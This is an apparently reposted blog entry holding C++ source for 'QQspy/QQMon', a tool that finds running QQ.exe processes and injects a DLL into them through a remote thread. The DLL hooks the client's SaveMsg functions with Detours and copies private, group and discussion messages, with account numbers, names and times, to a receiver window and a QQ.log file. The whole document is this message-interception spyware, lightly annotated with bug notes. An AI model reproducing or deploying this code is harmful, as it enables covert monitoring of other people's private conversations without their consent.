Hook QQ Message  

2012-08-30 08:30:23|  分类: VNC |  标签: |举报 |字号 订阅

//轉
#include "stdafx.h"
#include "QQspy.h"
#include "detours.h"
#pragma comment (lib, "detours.lib")
#include <set>
#include <shlwapi.h>
#pragma comment (lib, "shlwapi.lib")

// Function-pointer types for the KernelUtil.dll exports resolved in
// CQQMonApp::InitInstance() below. The mangled names in the comments are the
// strings handed to GetProcAddress(); the typedefs are hand-written guesses at
// the corresponding C++ signatures and are not all consistent with them (see
// the per-typedef notes).
typedef  BOOL  (__cdecl *M_SaveMsg_1)(LPCWSTR lpStr,
                    DWORD dTo_Num,
                    DWORD dFrom_Num,
                    DWORD dTo_Num_2,
                    struct ITXMsgPack * TXMsgPack,
                    struct ITXData* TXData);

// Second SaveMsg overload; `group` is the kind string that NewSaveMsg_2()
// compares against "group" and "discuss".
typedef BOOL (__cdecl *M_SaveMsg_2)(wchar_t *group,
                  wchar_t *un_1,
                  wchar_t *username,
                  wchar_t *un_1_,
                  int num_1,
                  int num_2,
                  struct ITXMsgPack * TXMsgPack,
                  struct ITXData* TXData);

//?GetMsgTime@Msg@Util@@YA_JPAUITXMsgPack@@@Z
// NOTE(review): the mangled name appears to encode a 64-bit (`_J`) return
// value, while the typedef says int; both hooks cast the result to time_t.
typedef int (__cdecl *M_GetMsgTime)(struct ITXMsgPack *TXMsgPack);
//?GetSelfUin@Contact@Util@@YAKXZ
typedef long (__cdecl *M_GetSelfUin)(void);
// The three *Name exports are declared (per their mangled names) to return a
// CTXStringW by value; the typedefs model that as an LPWSTR* out-parameter --
// presumably the hidden return slot, with CTXStringW's first member being the
// character pointer. TODO confirm against the target build.
typedef PVOID (__cdecl *M_GetPublicName)(LPWSTR *lpBuffer, DWORD dQQNum);
//?GetGroupName@Group@Util@@YA?AVCTXStringW@@K@Z
typedef PVOID (__cdecl *M_GetGroupName)(LPWSTR *lpBuffer, DWORD dGroupNum);
//?GetDiscussName@Group@Util@@YA?AVCTXStringW@@K@Z
typedef PVOID (__cdecl *M_GetDiscussName)(LPWSTR *lpBuffer, DWORD dGroupNum);
//?GetGroupMemLongNickname@Group@Util@@YAHKKAAVCTXStringW@@@Z
// NOTE(review): the export takes a CTXStringW&, not an MFC CString&; this
// type is only referenced from commented-out code further down.
typedef int (__cdecl *M_GetGroupMemLongNickname)(unsigned long,unsigned long,CString &);
//?GetGroupMemShowName@Group@Util@@YA?AVCTXStringW@@KK@Z
typedef PVOID (__cdecl *M_GetGroupMemShowName)(ULONG,ULONG);
//?GetSelfUin@Contact@Util@@YAKXZ
// Duplicate of the M_GetSelfUin typedef above (identical redeclaration, legal).
typedef long (__cdecl *M_GetSelfUin)(void);
// Also declared to return CTXStringW by value; lpPar_1 receives the caller's
// buffer (see the GetBufferSetLength(4096) calls in the hooks).
typedef  PVOID (__cdecl *M_GetMsgAbstract)(PVOID lpPar_1, struct ITXMsgPack * TXMsgPack);

// True*: raw export addresses obtained from GetProcAddress().
// Old*:  trampolines returned by DetourFunction(); a New* hook calls its Old*
//        counterpart to reach the original implementation.
M_SaveMsg_1      OldSaveMsg_1 = NULL;
M_SaveMsg_2      OldSaveMsg_2 = NULL;
M_SaveMsg_1      TrueSaveMsg_1 = NULL;
M_SaveMsg_2      TrueSaveMsg_2 = NULL;

M_GetMsgAbstract  TrueGetMsgAbstract = NULL;
M_GetMsgTime    TrueGetMsgTime = NULL;
M_GetGroupName    TrueGetGroupName = NULL;
M_GetDiscussName  TrueGetDiscussName = NULL;
M_GetPublicName    TrueGetPublicName = NULL;
M_GetSelfUin    TrueGetSelfUin = NULL;
M_GetSelfUin    OldGetSelfUin = NULL;

// Resolved only in commented-out code; both stay NULL.
M_GetGroupMemLongNickname TrueGetGroupMemLongNickname = NULL;
M_GetGroupMemShowName TrueGetGroupMemShowName = NULL;

// Hook bodies are defined after InitInstance(); declared here so the
// DetourFunction() calls can take their addresses.
BOOL  __cdecl NewSaveMsg_1(LPCWSTR lpStr,
               DWORD dTo_Num,
               DWORD dFrom_Num,
               DWORD dTo_Num_2,
               struct ITXMsgPack * TXMsgPack,
               struct ITXData* TXData);

BOOL __cdecl NewSaveMsg_2(wchar_t *group,
              wchar_t *un_1,
              wchar_t *username,
              wchar_t *un_1_,
              int num_1,
              int num_2,
              struct ITXMsgPack * TXMsgPack,
              struct ITXData* TXData);

// Replacement for KernelUtil's GetSelfUin that always reports one fixed
// account number. Its detour is commented out in both InitInstance() and
// ExitInstance(), so this function is currently never installed.
// Returns: the constant below (declared int here, long in M_GetSelfUin).
int __cdecl NewGetSelfUin(void)
{
    const int kFixedUin = 475318423;
    return kFixedUin;
}

// Forwards one formatted log line to a receiver window via WM_COPYDATA.
// The target is located purely by caption ("QQ"); presumably this is the
// CQQSPYDlg whose OnCopyData handler appears below -- confirm the dialog
// caption, since FindWindow() returns the first top-level window with that
// title and other windows may carry the same one. Does nothing if no window
// is found.
// NOTE(review): cbData is the character count WITHOUT the terminator and
// dwData is left uninitialized, so a receiver must bound its read by cbData
// rather than scanning for a NUL.
VOID __cdecl Sendinfo(CString str)
{
    COPYDATASTRUCT myCopyDATA;
    myCopyDATA.cbData=str.GetLength();
    myCopyDATA.lpData=str.GetBuffer(0);
    str.ReleaseBuffer();   // length fix-up only; the buffer stays valid while str lives
    HWND hwnd=::FindWindow(NULL,"QQ");
    if (hwnd) ::SendMessage(hwnd,WM_COPYDATA,NULL,(LPARAM)&myCopyDATA);   // synchronous, so the stack struct outlives the call
}

// Reports the currently logged-in account once at hook start-up.
// Resolves GetSelfUin from the already-loaded "KernelUtil" module, and if it
// returns a non-zero account number, emits "Login: <uin>" to the debugger,
// stores the bare text in theApp.filename (declared elsewhere), and sends it
// to the receiver window through Sendinfo(). Silently does nothing when the
// export is missing or the account number is 0. Called once from
// CQQMonApp::InitInstance().
VOID __stdcall Joker()
{
    ULONG fnGetSelfUin;
    ULONG currentQQ;
    fnGetSelfUin = (ULONG)GetProcAddress(GetModuleHandleA("KernelUtil"), "?GetSelfUin@Contact@Util@@YAKXZ");
    if (fnGetSelfUin)
    {
        currentQQ = ((ULONG (__cdecl*)())fnGetSelfUin)();
        if (currentQQ)
        {
            char buf[64];
            // %d with a ULONG argument prints large values as negative; 64 bytes
            // is ample for "Login: " plus an 11-character number.
            wsprintfA( buf, "Login: %d", currentQQ);
            CString fff = buf;
            fff =fff+"\r\n";
            OutputDebugString( fff);
            theApp.filename=buf;   // copy without the trailing CR/LF
            Sendinfo(fff);
        }
    }
}

// DLL start-up: resolves the KernelUtil.dll exports listed in the typedefs
// above and installs detours over both SaveMsg overloads.
// Returns FALSE (skipping CWinApp::InitInstance) as soon as any required
// export cannot be resolved; nothing is hooked in that case. Note that a
// failed LoadLibrary leaves hModule NULL, which the first GetProcAddress
// check then catches.
BOOL CQQMonApp::InitInstance()
{
    OutputDebugString("Hook Start");
    HMODULE hModule = GetModuleHandle(_T("KernelUtil.dll"));
    if (hModule == NULL) hModule = LoadLibrary("KernelUtil.dll");
    TrueSaveMsg_1 = (M_SaveMsg_1) GetProcAddress(hModule, "?SaveMsg@Msg@Util@@YAHPB_WKKKPAUITXMsgPack@@PAUITXData@@@Z");
    if (!TrueSaveMsg_1) return FALSE;
    TrueSaveMsg_2 = (M_SaveMsg_2) GetProcAddress(hModule, "?SaveMsg@Msg@Util@@YAHPB_W000KKPAUITXMsgPack@@PAUITXData@@@Z");
    if(!TrueSaveMsg_2) return FALSE;
    TrueGetMsgTime = (M_GetMsgTime)GetProcAddress(hModule, "?GetMsgTime@Msg@Util@@YA_JPAUITXMsgPack@@@Z");
    if (!TrueGetMsgTime) return FALSE;
    TrueGetPublicName = (M_GetPublicName)GetProcAddress(hModule, "?GetPublicName@Contact@Util@@YA?AVCTXStringW@@K@Z");
    if (!TrueGetPublicName) return FALSE;
    TrueGetGroupName = (M_GetGroupName) GetProcAddress(hModule, "?GetGroupName@Group@Util@@YA?AVCTXStringW@@K@Z");
    if (!TrueGetGroupName) return FALSE;
    TrueGetDiscussName = (M_GetDiscussName) GetProcAddress(hModule, "?GetDiscussName@Group@Util@@YA?AVCTXStringW@@K@Z");
    if (!TrueGetDiscussName) return FALSE;
    TrueGetSelfUin = (M_GetSelfUin)GetProcAddress(hModule, "?GetSelfUin@Contact@Util@@YAKXZ");
    if (!TrueGetSelfUin) return FALSE;
    TrueGetMsgAbstract = (M_GetMsgAbstract)GetProcAddress(hModule, "?GetMsgAbstract@Msg@Util@@YA?AVCTXStringW@@PAUITXMsgPack@@@Z");
    if (!TrueGetMsgAbstract) return FALSE;
    // Disabled lookups kept for reference. Note the copy/paste slip in the
    // last line (it tests TrueGetDiscussName instead of
    // TrueGetGroupMemLongNickname) and the `break` with no enclosing loop.
    //  ?GetGroupMemShowName@Group@Util@@YA?AVCTXStringW@@KK@Z
    //  TrueGetGroupMemShowName = (M_GetGroupMemShowName) GetProcAddress(hModule, "?GetGroupMemShowName@Group@Util@@YA?AVCTXStringW@@KK@Z");
    //  if (!TrueGetGroupMemShowName) break;
    //  ?GetGroupMemLongNickname@Group@Util@@YAHKKAAVCTXStringW@@@Z
    //  TrueGetGroupMemLongNickname = (M_GetGroupMemLongNickname) GetProcAddress(hModule, "?GetGroupMemLongNickname@Group@Util@@YAHKKAAVCTXStringW@@@Z");
    //  if (!TrueGetDiscussName) break;
    // Both pointers were already checked above, so the guards are redundant.
    // DetourFunction() returns the trampoline that the hooks use to call the
    // original; its return value is not checked for NULL here, which
    // ExitInstance() would then pass straight to DetourRemove().
    if (TrueSaveMsg_1) OldSaveMsg_1 = (M_SaveMsg_1) DetourFunction((PBYTE)TrueSaveMsg_1, (PBYTE)NewSaveMsg_1);
    if (TrueSaveMsg_2) OldSaveMsg_2 = (M_SaveMsg_2) DetourFunction((PBYTE)TrueSaveMsg_2, (PBYTE)NewSaveMsg_2);
    Joker();
    // The GetSelfUin detour (NewGetSelfUin) is intentionally left disabled.
    //OldGetSelfUin = (M_GetSelfUin) DetourFunction((PBYTE)TrueGetSelfUin, (PBYTE)NewGetSelfUin);
    return CWinApp::InitInstance();
}

// Detour over the first SaveMsg overload (the "[个聊]" / one-to-one case,
// judging by the tag it emits). Builds a header line
// "[个聊][self]name(from)to(to) hh:mm:ss", appends the message abstract,
// hands the result to Sendinfo() and the debugger, then forwards every
// argument unchanged to the original through the OldSaveMsg_1 trampoline.
// Parameter names follow the typedef; `data3` is dTo_Num_2 in the forward
// declaration. Returns whatever the original SaveMsg returns.
// All True* pointers used here were validated in InitInstance(), except that
// the TrueGetPublicName guard below is kept anyway.
BOOL  __cdecl NewSaveMsg_1(LPCWSTR lpStr,
               DWORD dTo_Num,
               DWORD dFrom_Num,
               DWORD data3,
               struct ITXMsgPack * TXMsgPack,
               struct ITXData* TXData )
{
    long lSelfQQNum = TrueGetSelfUin();   // compared against DWORDs below (signed/unsigned mix)
    time_t Time;
    struct tm *local;
    WCHAR wszStringTime[20] = {0};
    Time = (time_t)TrueGetMsgTime(TXMsgPack);
    // NOTE(review): localtime() returns NULL for an unrepresentable time and
    // is dereferenced unchecked on the next line.
    local = localtime(&Time);
    swprintf(wszStringTime,L"%0.2d:%0.2d:%0.2d",local->tm_hour,local->tm_min,local->tm_sec);
    LPWSTR lpName1 = NULL,lpName2 = NULL;
    if (TrueGetPublicName)
    {
        // Presumably display names for the sender and the recipient; they
        // stay NULL if the lookup does not fill them and are then printed via
        // %ws. lpName2 is never used.
        TrueGetPublicName(&lpName1, dFrom_Num);
        TrueGetPublicName(&lpName2, dTo_Num);
    }
    WCHAR wszStringBuffer[MAX_PATH] = {0};
    CString  ms1;
    CString  ms2;
    // The two branches produce an identical header: one for messages sent by
    // this account, one for messages addressed to it. Anything else leaves
    // ms1 empty. The two-argument swprintf has no length bound, so a long
    // name can overflow the MAX_PATH-character buffer.
    if(lSelfQQNum == dFrom_Num)
    {
        swprintf(wszStringBuffer,L"[个聊][%d]%ws(%u)to(%u) %ws",lSelfQQNum,lpName1,dFrom_Num,dTo_Num,wszStringTime);
        ms1=wszStringBuffer;
    }
    if(lSelfQQNum != dFrom_Num && dTo_Num == lSelfQQNum)
    {
        swprintf(wszStringBuffer,L"[个聊][%d]%ws(%u)to(%u) %ws",lSelfQQNum,lpName1,dFrom_Num,dTo_Num,wszStringTime);
        ms1=wszStringBuffer;
    }
    CString strBuffer;
    // GetMsgAbstract is declared to return CTXStringW by value; the 4096-char
    // CString buffer is passed as its first argument (presumably the hidden
    // return slot) and the result is reinterpreted as LPWSTR* and
    // dereferenced -- this assumes CTXStringW's first member is the wide
    // character pointer. TODO confirm. The buffer is never released back to
    // strBuffer with ReleaseBuffer().
    LPWSTR *lpBuffer =(LPWSTR *)TrueGetMsgAbstract(strBuffer.GetBufferSetLength(4096), TXMsgPack);
    ms2=ms1+"\r\n"+*lpBuffer;   // wide-to-narrow conversion happens here (this file is an MBCS build)
    Sendinfo(ms2);
    OutputDebugString(ms2);
    return OldSaveMsg_1(lpStr, dTo_Num, dFrom_Num, data3, TXMsgPack, TXData);
}

// Detour over the second SaveMsg overload. `group` is a kind string: for
// "group" a "[群聊]" header is built using the group name, for "discuss" a
// "[讨聊]" header using the discussion name; any other kind is forwarded
// without logging. Each header is followed by the message abstract and sent
// to the debugger and Sendinfo() before the original SaveMsg is reached via
// the OldSaveMsg_2 trampoline, whose return value is passed through.
// Comparisons are case-insensitive. num_1 / num_2 are printed as-is; their
// meaning is not established by this file (num_1 is what the name lookups
// take, so it is presumably the group/discussion id).
BOOL __cdecl NewSaveMsg_2( wchar_t *group, wchar_t *un_1, wchar_t *username, wchar_t *un_1_, int num_1, int num_2, struct ITXMsgPack * TXMsgPack, struct ITXData* TXData )
{
    time_t Time;
    struct tm *local;
    WCHAR wszStringTime[20] = {0};
    Time = (time_t)TrueGetMsgTime(TXMsgPack);
    local = localtime(&Time);   // NOTE(review): NULL on an unrepresentable time, dereferenced unchecked below
    swprintf(wszStringTime,L"%0.2d:%0.2d:%0.2d",local->tm_hour,local->tm_min,local->tm_sec);
    long lSelfQQNum = TrueGetSelfUin();
    WCHAR wszStringBuffer[2*MAX_PATH] = {0};   // unbounded swprintf below; long names can overflow it
    CString strBuffer;
    // Same CTXStringW reinterpretation as in NewSaveMsg_1 -- TODO confirm the
    // layout assumption; the 4096-char buffer is never released.
    LPWSTR *lpBuffer =(LPWSTR *) TrueGetMsgAbstract(strBuffer.GetBufferSetLength(4096), TXMsgPack);
    CString strGroup(group);   // wide -> narrow conversion via the current code page
    LPWSTR lpName1 = NULL;
    CString ms1;
    if (strGroup.CompareNoCase("group") == 0)
    {
        // NOTE(review): guards on TrueGetPublicName but calls TrueGetGroupName
        // (copy/paste slip). Harmless only because InitInstance() refuses to
        // install the hooks unless both were resolved.
        if (TrueGetPublicName) TrueGetGroupName(&lpName1, num_1);
        //  TXStr Str;
        //  TrueGetGroupMemLongNickname(num_1,num_2,Str);
        //  OutputDebugStringW(Str.str);
        swprintf(wszStringBuffer,L"[群聊][%d][%ws] %ws(%d)(%d) %ws",lSelfQQNum ,lpName1,username, num_1,num_2,wszStringTime);
        ms1=wszStringBuffer;
        ms1=ms1+"\r\n"+*lpBuffer;
        OutputDebugString(ms1);
        Sendinfo(ms1);
    }
    else if (strGroup.CompareNoCase("discuss") == 0)
    {
        if (TrueGetDiscussName) TrueGetDiscussName(&lpName1, num_1);
        swprintf(wszStringBuffer,L"[讨聊][%d][%ws] %ws(%d)(%d) %ws",lSelfQQNum ,lpName1,username, num_1,num_2,wszStringTime);
        ms1=wszStringBuffer;
        ms1=ms1+"\r\n"+*lpBuffer;
        OutputDebugString(ms1);
        Sendinfo(ms1);
    }
    return OldSaveMsg_2(group, un_1, username, un_1_, num_1, num_2, TXMsgPack, TXData);
}

// DLL shutdown: removes the two SaveMsg detours and chains to the base class.
// DetourRemove() is given the trampoline and the hook, mirroring the
// DetourFunction() calls in InitInstance(). If InitInstance() bailed out
// before installing the hooks, OldSaveMsg_1/2 are still NULL and are passed
// as-is; what DetourRemove() does with a NULL trampoline is not checked here.
int CQQMonApp::ExitInstance()
{
    OutputDebugString("Hook Exit");
    DetourRemove((PBYTE)OldSaveMsg_1, (PBYTE)NewSaveMsg_1);
    DetourRemove((PBYTE)OldSaveMsg_2, (PBYTE)NewSaveMsg_2);
    // The GetSelfUin detour was never installed, so nothing to remove.
    //DetourRemove((PBYTE)OldGetSelfUin, (PBYTE)NewGetSelfUin);
    return CWinApp::ExitInstance();
}

///////////////////////////////////////////////////////////////////////////////////////
// Despite the name, this finds processes by IMAGE NAME, not by PID.
// Walks a Toolhelp32 snapshot; for every process whose executable name equals
// pszProcessName (case-sensitive strcmp) it appends the PID to m_list unless
// it is already listed, and for each newly listed PID calls Inject() with
// "<current directory>\QQMon.dll", reporting success/failure with a message
// box. Returns the PID of the last match, or 0 if none / the snapshot failed.
// The snapshot handle is closed on every path.
// NOTE(review): strcat() into the MAX_PATH buffer is unbounded -- a long
// current directory overflows Folder. `s2` (the hard-coded release path) and
// USES_CONVERSION are unused leftovers.
DWORD CQQSPYDlg::FindByPID(PTSTR pszProcessName)
{
    DWORD dwProcessID = 0;
    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) return 0;
    pe32.dwSize = sizeof(PROCESSENTRY32);   // required before Process32First
    if(!Process32First(hProcessSnap, &pe32))
    {
        CloseHandle(hProcessSnap);
        return 0;
    }
    do
    {
        if (strcmp(pszProcessName, pe32.szExeFile) == 0)
        {
            dwProcessID = pe32.th32ProcessID;
            CString  s1;
            s1.Format("%d",dwProcessID);   // PID as decimal text; this is the list-box key
            // Linear scan of the list box for an existing entry with this PID.
            int ss=m_list.GetCount();
            int tt=0;
            for (int i=0;i<ss;i++)
            {
                CString  s2;
                m_list.GetText(i,s2);
                if (s1==s2)
                {
                    tt=1;
                    break;
                }
            }
            if (tt==0)
            {
                m_list.AddString(s1);
                TCHAR  Folder[MAX_PATH];
                ::GetCurrentDirectory(MAX_PATH,Folder);
                strcat(Folder, "\\QQMon.dll");
                LPCTSTR s2=_T("F:\\QQ\\QQMon\\Release");   // unused
                USES_CONVERSION;   // unused
                BOOL bInject=Inject(Folder,pe32.th32ProcessID);
                if (bInject)
                    AfxMessageBox(_T("成功"));
                else
                    AfxMessageBox(_T("失败"));
            }
        }
    }
    while(Process32Next(hProcessSnap, &pe32));
    CloseHandle(hProcessSnap);
    return dwProcessID;
}

// Receiver side of the WM_COPYDATA channel used by Sendinfo(): logs the
// incoming text through insertmsg() and appends it, plus CR/LF, to the
// m_edit control. Returns the base-class result.
// NOTE(review): the assignment from (LPSTR)lpData scans for a NUL before
// Left(cbData) trims the result. The sender sets cbData WITHOUT a terminator
// and only cbData bytes are marshalled across processes, so the scan can run
// past the end of the received buffer. Constructing the string from
// (lpData, cbData) directly would bound the read.
BOOL CQQSPYDlg::OnCopyData(CWnd* pWnd, COPYDATASTRUCT* pCopyDataStruct)
{
    CString  m_strCopyData;
    m_strCopyData=(LPSTR)pCopyDataStruct->lpData;
    m_strCopyData=m_strCopyData.Left(pCopyDataStruct->cbData);
    insertmsg(m_strCopyData);
    CString  ml;
    m_edit.GetWindowText(ml);
    m_edit.SetWindowText(ml+m_strCopyData+"\r\n");   // whole-text rewrite; grows with every message
    return CDialog::OnCopyData(pWnd, pCopyDataStruct);
}

// Button handler: scans for "QQ.exe" processes and lets FindByPID() do the
// listing and injection. The PID that FindByPID() returns is not needed
// here and is discarded.
void CQQSPYDlg::OnBnClickedButton1()
{
    TCHAR targetImage[] = TEXT("QQ.exe");
    (void)FindByPID(targetImage);
}

// Loads szModule into process dwID using the remote-thread / LoadLibrary
// pattern: open the process, allocate a buffer in it, copy the module path
// (including terminator) there, and start a remote thread whose entry point
// is LoadLibraryA/W with that buffer as its argument. This relies on
// kernel32 being mapped at the same address in both processes.
// Returns TRUE once the remote thread has been CREATED -- it does not wait
// for it, so TRUE does not mean the DLL actually loaded.
// NOTE(review): hProcess is leaked on every early-return path after
// OpenProcess(), and the remote allocation is never freed.
// NOTE(review): cross-process thread creation of this shape is exactly what
// endpoint monitoring keys on; expect it to be flagged.
BOOL  CQQSPYDlg::Inject(LPCTSTR szModule, DWORD dwID)
{
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwID);
    if ( !hProcess ) return FALSE;
    int cByte  = (_tcslen(szModule)+1) * sizeof(TCHAR);   // bytes including the NUL
    LPVOID pAddr = VirtualAllocEx(hProcess, NULL, cByte, MEM_COMMIT, PAGE_READWRITE);
    if ( !pAddr || !WriteProcessMemory(hProcess, pAddr, szModule, cByte, NULL)) return FALSE;
    // Pick the LoadLibrary variant matching this build's character set, since
    // the path was written in TCHARs.
    #ifdef _UNICODE
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(_T("Kernel32")), "LoadLibraryW");
    #else
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(_T("Kernel32")), "LoadLibraryA");
    #endif
    if ( !pfnStartAddr ) return FALSE;
    DWORD dwThreadID = 0;
    HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, pfnStartAddr, pAddr, 0, &dwThreadID);
    if ( !hRemoteThread ) return FALSE;
    CloseHandle(hRemoteThread);
    CloseHandle(hProcess);
    return(TRUE);
}

// Appends one received log line, plus CR/LF, to "QQ.log" in the current
// directory. The three if-blocks parse the line according to its leading tag
// ("[讨聊]", "[群聊]", "[个聊]" -- the headers built by the NewSaveMsg hooks)
// into q1..q6, but those fields are never used: only the raw line is written.
// The Left(6) tag tests assume each CJK character occupies two bytes, i.e. a
// DBCS source/build code page -- TODO confirm.
// The parsing is index arithmetic against the hook's exact header layout and
// is fragile; see the per-line notes. No error checking on the file open.
void CQQSPYDlg::insertmsg (CString ss)
{
    CString  m_strCopyData;
    m_strCopyData=ss;
    // "默认消息" = placeholder text for fields that are not parsed.
    CString q1="默认消息";
    CString q2="默认消息";
    CString q3="默认消息";
    CString q4="默认消息";
    CString q5="默认消息";
    CString q6="默认消息";
    if ( m_strCopyData.Left(6)=="[讨聊]")
    {
        q2="讨聊";
        CString s1=m_strCopyData.Right(m_strCopyData.GetLength()-7);   // text after "[讨聊]["
        int s2=s1.FindOneOf("]");
        q1=s1.Mid(0,s2);   // self uin

        CString s3 =s1.Right(s1.GetLength()-s2-2);
        int s4 =s3.FindOneOf("]");
        q3=s3.Mid(0,s4);   // discussion name

        // NOTE(review): uses s1's length to slice s3 (copy/paste slip); MFC
        // clamps an over-long Right() count, which is presumably why it
        // still appears to work.
        CString s7=s3.Right(s1.GetLength()-s4);
        int   s8 =s7.FindOneOf(")");
        int   s9 =s7.FindOneOf(":");
        q4=s7.Mid(s8+2,s9-s8-6);

        int s5=s1.FindOneOf(":");
        q5=s1.Mid(s5-2,8);   // "hh:mm:ss" around the first colon
        q6=s1.Right(s1.GetLength()-s5-6);   // message body after the time stamp
   }
   if ( m_strCopyData.Left(6)=="[群聊]")
   {
        q2="群聊";
        CString s1=m_strCopyData.Right(m_strCopyData.GetLength()-7);
        int s2=s1.FindOneOf("]");
        q1=s1.Mid(0,s2);   // self uin
        int s3 =s1.FindOneOf("(");
        int s4 =s1.FindOneOf(")");
        q3=s1.Mid(s3+1,s4-s3-1);   // first parenthesised number
        // First '[' after the self uin -> group name.
        int s5=s1.FindOneOf("[");
        int s6=s1.Find("]",s5);
        q4=s1.Mid(s5+1,s6-s5-1);

        int s7=s1.FindOneOf(":");
        q5=s1.Mid(s7-2,8);
        q6=s1.Right(s1.GetLength()-s7-6);
   }
   if ( m_strCopyData.Left(6)=="[个聊]")
   {
        q2="个聊";
        CString s1=m_strCopyData.Right(m_strCopyData.GetLength()-7);
        int s2=s1.FindOneOf("]");
        q1=s1.Mid(0,s2);   // self uin
        // Note: these searches run on the full line, not on s1.
        // FindOneOf("to") matches the first 't' OR 'o', not the word "to".
        int s3= m_strCopyData.FindOneOf("(");
        int s4= m_strCopyData.FindOneOf("to");
        q3=m_strCopyData.Mid(s3+1,s4-s3-2);   // sender uin
        CString s5 =m_strCopyData.Right(m_strCopyData.GetLength()-s4-3);
        int s6 =s5.FindOneOf(")");
        q4 =s5.Mid(0,s6);   // recipient uin
        int s7 =s5.FindOneOf(":");
        q5 =s5.Mid(s7-2,8);
        q6=s5.Right(s5.GetLength()-s7-6);
   }

  // Only the raw line is persisted; q1..q6 are dropped here.
  m_strCopyData =m_strCopyData+"\r\n";
  int nLength =m_strCopyData.GetLength();
  CString fileName;
  fileName="QQ.log";   // relative to the process's current directory
  CStdioFile file;
  // Open result is not checked; a failure makes the following calls throw or
  // misbehave. No typeBinary flag, so the stream is in text mode -- the "\r\n"
  // appended above may be translated again on write; verify if the log
  // shows doubled CRs.
  file.Open(fileName,CFile::modeCreate |CFile::modeNoTruncate| CFile::modeWrite);
  file.SeekToEnd();
  file.Write( m_strCopyData,nLength);
  file.Close();
}